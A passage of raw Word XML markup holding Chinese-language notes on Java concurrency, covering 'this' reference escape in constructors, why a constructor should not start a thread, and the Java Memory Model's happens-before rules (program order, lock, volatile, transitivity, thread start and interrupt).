        <w:t>逃逸是指</w:t>
      </w:r>
      <w:r w:rsidRPr="00252407">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>在构造函数返回之前其他线程就持有该对象的引用</w:t>
      </w:r>
      <w:r w:rsidR="00252407">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41761">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>调</w:t>
      </w:r>
      <w:r w:rsidRPr="00252407">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>用尚未构造完全的对象的方法可能引发令人疑惑的错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41761">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41761">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>因此应该避免</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41761">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41761">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>逃逸的发生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F41761" w:rsidRDefault="00F9298A" w:rsidP="00F9298A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLine="380"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9298A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9298A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>逃逸经常发生在构造函数中启动线程或注册监听器时</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9298A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F9298A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9298A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9298A" w:rsidRPr="00F41761" w:rsidRDefault="00F9298A" w:rsidP="00F9298A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLine="380"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4805433" cy="1976288"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="29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4" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4805951" cy="1976501"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00521619" w:rsidRPr="00F41761" w:rsidRDefault="00521619" w:rsidP="00521619">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00521619" w:rsidRDefault="00F9298A" w:rsidP="00CE6A5E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9298A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在构造函数中创建</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9298A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9298A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象是没有问题的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9298A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F9298A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>但是不要启动</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9298A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9298A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F9298A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以提供一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9298A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9298A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9298A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F9298A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9298A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9298A" w:rsidRPr="00521619" w:rsidRDefault="00F9298A" w:rsidP="00CE6A5E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2688953"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="29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5" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2688953"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C5F83" w:rsidRDefault="009A2C65" w:rsidP="003C5F83">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="003C5F83" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="003C5F83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>happen</w:t>
      </w:r>
      <w:r w:rsidR="003C5F83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="003C5F83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r w:rsidR="003C5F83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>几个原则</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B40B5" w:rsidRDefault="009B40B5" w:rsidP="00E378E4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00E378E4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="00E378E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>appen</w:t>
      </w:r>
      <w:r w:rsidRPr="00E378E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00E378E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r w:rsidRPr="00E378E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>阐述操作之间的内存可见性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JMM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，如果一个操作执行的结果需要对另一个操作线程，那么这两个操作之间必须存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>happen-before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关系。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF42DC" w:rsidRDefault="00CF42DC" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="240" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>程序次序规则：一个线程内，按照代码顺序，书写在前面的操作先行发生于书写在后面的操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF42DC" w:rsidRDefault="00CF42DC" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="240" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>锁定规则：一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>unLock</w:t>
      </w:r>
      <w:r w:rsidR="00102193">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作先行发生于后面对同一个锁的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>lock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF42DC" w:rsidRDefault="00CF42DC" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="240" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>变量规则：对一个变量的写操作先行发生于后面对这个变量的读操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF42DC" w:rsidRDefault="00CF42DC" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="240" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>传递规则：如果操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>先行发生于操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，而操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>又先行发生于操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，则可以得出操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>先行发生于操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF42DC" w:rsidRDefault="00CF42DC" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="240" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>线程启动规则：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>start()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法先行发生于此线程的每个一个动作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF42DC" w:rsidRDefault="00CF42DC" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="240" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>线程中断规则：对线程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>interrupt()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法的调用先行发生于被中断线程的代码检测到中断事件的发生</w:t>
      </w:r>
